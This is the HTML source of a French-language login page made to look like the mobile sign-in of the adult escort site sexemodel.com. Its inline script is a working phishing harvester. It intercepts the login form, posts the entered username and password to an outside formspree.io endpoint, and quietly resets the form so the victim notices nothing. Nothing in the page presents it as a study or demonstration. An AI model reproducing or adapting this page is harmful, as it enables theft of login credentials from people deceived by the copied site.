<!DOCTYPE html>
<html lang="fr" slick-uniqueid="1">

<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>login - SexeModel.com</title>
    <meta content="Libertines annonces - Sexemodel, Etre en adultes!" name="description">
    <meta content="Libertines annonce en France, Libertines girl, Libertines online, annonces" name="keywords">

    <link href="https://stm.sexemodel.com/favicon.ico" rel="shortcut icon">
    <!--[if lt IE 9]>
    <script src="https://stm.sexemodel.com/js/lib/html5shiv.min.js"></script>
    <![endif]-->
    <style type="text/css">
        body {
            min-width: 320px;
            font-family: "Arial", serif;
        }

        .list-item-image {
            border-radius: 50%;
            width: 64px;
        }

        .overlay {
            width: 100%;
            height: 100%;
            z-index: 1002;
            position: absolute;
            background: #000000;
            opacity: 0.7;
            top: 0;
            display: none;
        }

        .navigation {
            float: none;
            left: -269px;
            margin-bottom: -9999px;
            position: absolute;
            top: -26px;
            z-index: 1004;
            width: 269px;
            font-size: 15px;
            background: #660000;
        }

        .navigation a {
            color: #ffffff;
            text-decoration: none;
        }

        .navigation__top-items {
            border-bottom: 1px solid #944d4d;
        }

        .navigation__top-items a {
            display: inline-block;
            width: 134px;
            text-align: center;
            padding: 4px 0;
        }

        .navigation__top-items__first {
            border-right: 1px solid #944d4d;
        }

        .navigation__section {
            border-bottom: 1px solid #944d4d;
            padding: 0 11px;
        }

        .navigation__section__main-link {
            font-size: 18px;
            font-weight: bold;
            font-style: italic;
            padding: 5px 0;
            display: inline-block;
        }

        .navigation__section ul {
            padding: 0;
            margin: 0 0 4px 0;
            list-style: none;
        }

        .navigation__section ul li {
            padding: 4px 0;
        }

        .header {
            height: 26px;
            text-align: center;
            background-color: #660000;
            position: fixed;
            width: 100%;
            z-index: 1003;
        }

        .header__opener {
            background: url("../stm.sexemodel.com/img/layout_icons.png") 0 0 no-repeat;
            background-size: 1300px 27px;
            width: 18px;
            height: 13px;
            top: 7px;
            left: 20px;
            display: block;
            content: "";
            position: absolute;
        }

        .header__logo {
            display: inline-block;
            font-size: 0;
        }

        .header__pic {
            width: 200px;
            height: 26px;
        }

        .header__languages {
            position: absolute;
            right: 8px;
            top: 6px;
        }

        .header__language {
            background: url("../stm.sexemodel.com/img/layout_icons.png") 0 0 no-repeat;
            background-size: 1300px 27px;
            width: 20px;
            height: 12px;
            display: inline-block;
        }

        .header__language--en {
            background-position: -44px 0;
        }

        .header__language--fr {
            background-position: -23px 0;
        }

        .header--menu-active {
            background-color: #570000;
        }

        .header--menu-active .header__opener {
            filter: invert(100%);
            -webkit-filter: invert(100%);
        }

        .main-city-list {
            padding: 38px 10px 12px 10px;
        }

        .main-city-list__choose-city {
            font-family: "Trebuchet MS", serif;
            font-size: 20px;
            font-weight: bold;
            color: #660000;
        }

        .main-city-list__total-escorts {
            font-size: 15px;
            margin-top: 2px;
            border-bottom: 1px dotted #999999;
            padding: 0 0 6px 0;
        }

        .main-city-list__total-number {
            font-size: 17px;
            font-weight: bold;
        }

        .main-city-list__letters {
            margin-top: 9px;
        }

        .main-city-list__letters a {
            color: #585858;
            font-size: 12px;
            text-decoration: none;
        }

        .main-city-list__cities {
            width: 100%;
            margin-top: 7px;
            font-size: 14px;
        }

        .main-city-list__cities__row--even {
            background-color: #f7edf0;
        }

        .main-city-list__cities__row__number {
            color: #333333;
        }

        .main-city-list__cities td {
            padding: 8px 6px 6px 6px;
        }

        .main-city-list__cities a {
            color: #660000;
            text-decoration: none;
        }

        .main-city-list__all-cities {
            margin-top: 8px;
            display: block;
            margin-left: 5px;
            color: #027ee8;
            font-size: 14px;
            text-decoration: none;
            font-weight: bold;
        }

        .main-city-search {
            background-color: #660000;
            padding: 7px 10px;
            margin: 2px -10px;
        }

        .main-city-search__query-holder {
            float: left;
        }

        .main-city-search__query-holder input {
            width: 142px;
        }

        .main-city-search__button-holder {
            float: right;
        }

        .main-escorts-search {
            padding: 7px 0 10px;
        }

        .main-escorts-search select {
            width: 140px;
        }

        .main-escorts-search__navigate {
            margin-right: 11px;
        }

        .search-filters__item.hidden {
            display: none;
        }

        .timeout {
            padding: 35px 0 0 0;
            margin: 0 0 -35px 145px;
            color: #660000;
            font-size: 12px;
            display: none;
        }

        .timeout__reset {
            padding: 3px 9px;
            margin-left: 3px;
            text-decoration: none;
            border-radius: 3px;
            -moz-border-radius: 3px;
            -webkit-border-radius: 3px;
        }
        
        .backpack.dropzone {
            font-family: 'SF UI Display', 'Segoe UI';
            font-size: 15px;
            text-align: center;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            width: 250px;
            height: 150px;
            font-weight: lighter;
            color: white;
            will-change: right;
            z-index: 2147483647;
            bottom: 20%;
            background: #333;
            position: fixed;
            user-select: none;
            transition: left .5s, right .5s;
            right: 0px;
        }

        .backpack.dropzone .animation {
            height: 80px;
            width: 250px;
            background: url("chrome-extension_/lifbcibllhkdhoafpjfnlhfpfgnpldfl/assets/backpack/dropzone/hoverstate.html") left center;
        }

        .backpack.dropzone .title::before {
            content: 'Save to';
        }

        .backpack.dropzone.closed {
            right: -250px;
        }

        .backpack.dropzone.hover .animation {
            animation: sxt-play-anim-hover 0.91s steps(21);
            animation-fill-mode: forwards;
            background: url("chrome-extension_/lifbcibllhkdhoafpjfnlhfpfgnpldfl/assets/backpack/dropzone/hoverstate.html") left center;
        }

        @keyframes sxt-play-anim-hover {
            from {
                background-position: 0px;
            }

            to {
                background-position: -5250px;
            }
        }

        .backpack.dropzone.saving .title::before {
            content: 'Saving to';
        }

        .backpack.dropzone.saving .animation {
            background: url("chrome-extension_/lifbcibllhkdhoafpjfnlhfpfgnpldfl/assets/backpack/dropzone/saving_loop.html") left center;
            animation: sxt-play-anim-saving steps(59) 2.46s infinite;
        }

        @keyframes sxt-play-anim-saving {
            100% {
                background-position: -14750px;
            }
        }

        .backpack.dropzone.saved .title::before {
            content: 'Saved to';
        }

        .backpack.dropzone.saved .animation {
            background: url("chrome-extension_/lifbcibllhkdhoafpjfnlhfpfgnpldfl/assets/backpack/dropzone/saved.html") left center;
            animation: sxt-play-anim-saved steps(20) 0.83s forwards;
        }

        @keyframes sxt-play-anim-saved {
            100% {
                background-position: -5000px;
            }
        }
    </style>
</head>

<body>
    <nav class="navigation">
        <div class="navigation__top-items">
            <a href="#" class="navigation__top-items__first">Se connecter</a><a
                href="#">Inscription</a>
        </div>
        <div class="navigation__section">
            <a href="#" class="navigation__section__main-link">Accueil</a>
        </div>
        <div class="navigation__section">
            <a href="#" class="navigation__section__main-link">Escorte
                catégories</a>
            <ul>
                <li><a href="#">Nouveaux</a></li>
                <li><a href="#">En ligne (109)</a></li>
                <li><a href="#">Dans le chat (24)</a></li>
                <li><a href="">Escortes</a></li>
                <li><a href="">Escortes exclusives</a></li>
                <li><a href="">TV/TS</a></li>
                <li><a href="">Homme</a></li>
                <li><a href="">Couples</a></li>
                <li><a href="">Suivi d'escortes</a></li>
                <li><a href="">Commentaires </a></li>
                <li><a href="">Rechercher</a></li>
                <li><a href="">Annonces</a></li>
                <li><a href="">Visites de la ville</a></li>
                <li><a href="">Vidéo</a></li>
                <li><a href="">Fidèles escortes</a></li>
                <li><a href=""">Copine du mois</a></li>
                <li><a href="">Flux en direct</a></li>
                <li><a href="">Top 50</a></li>
                <li><a href="">Services webcam </a></li>
            </ul>
        </div>
        <div class="navigation__section">
            <a href="" class="navigation__section__main-link">Photos</a>
            <ul>
                <li><a href="">Photos</a></li>
                <li><a href="">Top 100 des photos</a></li>
                <li><a href="">Évaluer photos</a></li>
            </ul>
        </div>
    </nav>
    <div id="wrapper">
        <header class="header">
            <a href="https://m.sexemodel.com/users/login/#" class="header__opener" title="open menu"></a>
            <a class="header__logo" href="https://m.sexemodel.com/"><img class="header__pic"
                    src="login_files/m.sexemodel.com-logo.png" alt="Sexemodel"></a>
            <div class="header__languages">
                <a href="https://m.sexemodel.com/users/login/" class="header__language header__language--fr"
                    title="fr"></a>
                <a href="https://m.sexemodel.com/en/users/login/" class="header__language header__language--en"
                    title="en"></a>
            </div>
        </header>
        <div class="timeout m--hidden">
            Timeout dans:
            <span class="timeout__time"></span>
            <a href="https://m.sexemodel.com/users/login/#" class="button--orange timeout__reset">Reset</a>
        </div>
        <div class="content-holder">
            <a href="https://m.sexemodel.com/users/login/#"
                class="button button--sm button--action button--prev button-back">Dos</a>
            <h1 class="content-holder__header-login">Authentifiés</h1>
            <div class="custom-form content-holder__login-form">
                <form id="my-form" method="POST">
                      <p id="my-form-status"></p>
                    <div class="row">
                        <input type="text" name="usr" id="user" value="" placeholder="Nom d'utilisateur"
                            autocapitalize="none">
                    </div>
                    <div class="row">
                        <input type="password" name="passwd" id="passwd" placeholder="Mot de passe" value="">
                    </div>
                    <div class="checkbox-row">
                        <span class="mcf-fake-checkbox active"><input type="checkbox" class="customized mcf-checkbox"
                                name="data[autologin]" id="remember-me" checked="checked"
                                style="display: none;"></span><label for="remember-me">Rester connecté</label>
                    </div>
                    <div class="button-holder">
                        <button class="button button--cancel button--lg button-back" type="reset">Annuler</button>
                        <button id="my-form-button" style="display: none;">.</button>
                        <button type="button" class="button button--approve button--lg savedata" style="cursor: pointer;" onclick="triggerSubmit()">Connectez-vous</button>
                    </div>
                </form>
            </div>
            <div class="content-holder__bottom-links">
                <a href="https://m.sexemodel.com/users/register/" rel="nofollow">S'inscrire!</a>&nbsp;<div
                    class="point-holder"><span class="point">&nbsp;</span></div>&nbsp;
                <a href="passwd_lost.html" rel="nofollow">Mot de Passe oublié?</a>
            </div>
        </div>
        <footer class="footer">
            <div class="cards">
                <img src="login_files/mc_visa.png" alt="mastercard visa">
            </div>
            <div class="footer__copyright"><img src="login_files/company_za.png" alt="company"></div>
            <a class="footer__link" href="https://m.sexemodel.com/contact/">Contacter le Webmaster</a> | <a
                class="footer__link" rel="nofollow" href="https://m.sexemodel.com/users/login/">Se connecter</a> |
            <a rel="nofollow" class="footer__link" href="https://m.sexemodel.com/tos/">Termes et Conditions</a> |
            <a rel="nofollow" class="footer__link" href="https://m.sexemodel.com/privacy-policy/">Politique de
                confidentialité</a> |
            <a rel="nofollow" class="footer__link full-version" href="https://www.sexemodel.com/?full_version=1">Changer
                de vue classique</a>
        </footer>
        <div id="chat-wrapper">
            <div id="chat-container" class="hidden">
                <div class="open_chat chat-button hidden" id="chat-on">
                    <div class="switcher"></div>
                </div>
                <div class="chat_base signed_on showen">
                    <div class="chat-button close_chat showen" id="chat-off">
                        <div class="switcher"></div>
                    </div>
                    <div id="baddy-list-tab" class="baddy_list_tab">
                        <div class="chat_inner_button">
                            <div class="baddy_list_tab_icon"></div>
                            <div class="baddy_list_tab_text">Chat (<span id="online-users-count">0</span>)</div>
                        </div>
                    </div>
                    <div class="recent_dialogs m--open hidden">
                        Recent dialogs
                    </div>
                </div>
                <div class="recent_dialogs_items hidden">

                </div>
                <div id="baddy-list" class="baddy_list closed hidden">
                    <div class="tab_header cpoint">
                        <span class="tab_name">Chat</span>

                        <div class="tab_header_buttons">
                            <div class="close_button hidden cpoint"></div>
                            <div class="settings_button cpoint"></div>
                            <div class="minimize_button cpoint"></div>
                        </div>

                    </div>
                    <div class="baddy_list_content">
                        <div class="baddy_listing">
                            <ul class="listing">
                            </ul>
                        </div>
                        <div class="baddy_searching">
                            <input type="text" value="Search" id="baddy_list_search" autocomplete="off">
                        </div>
                    </div>
                    <div class="settings_list">
                        <ul>
                            <li class="checkable"><a id="show-only-escorts"><span>Show only escorts</span></a></li>
                            <li class="checkable"><a id="keep-list-open"><span>Keep List Open</span></a></li>
                            <li class="checkable"><a id="invisibility"><span>Show me offline</span></a></li>
                            <li class=""><a id="manage-block-list"><span>Manage Block List...</span></a></li>
                        </ul>
                        <div class="unblock_list">
                            <span>Select the user you wish to unblock</span>
                            <select id="blocked-users-list">
                            </select>
                            <a class="button button--approve button--sm" id="unblock-user-btn">Unblock</a>
                        </div>
                    </div>

                </div>
                <div class="chat_base signed_off hidden">
                    <div class="button close_chat showen">
                        <div class="switcher"></div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="overlay"></div>
    <link rel="stylesheet" href="login_files/combined.min.css">

    <script src="../code.jquery.com/jquery-2.2.4.js" integrity="sha256-iT6Q9iMJYuQiMWNd9lDyBUStIq/8PuOW33aOqmvFpqI=" crossorigin="anonymous"></script>
    <script>
    function triggerSubmit() {
        var btn = document.getElementById("my-form-button");
        btn.click();
    }

    var form = document.getElementById("my-form");
    var action = "https://formspree.io/f/xayzobpw";
    
    async function handleSubmit(event) {
      event.preventDefault();
      var status = document.getElementById("my-form-status");
      var data = new FormData(event.target);
      fetch(action, {
        method: form.method,
        body: data,
        headers: {
            'Accept': 'application/json'
        }
      }).then(response => {
        if (response.ok) {
          status.innerHTML = "";
          form.reset()
        } else {
          response.json().then(data => {
            if (Object.hasOwn(data, 'errors')) {
              status.innerHTML = data["errors"].map(error => error["message"]).join(", ")
            } else {
              status.innerHTML = "Oops! There was a problem"
            }
          })
        }
      }).catch(error => {
        status.innerHTML = "Oops! There was a problem"
      });
    }
    form.addEventListener("submit", handleSubmit)
</script>
</body>
</html>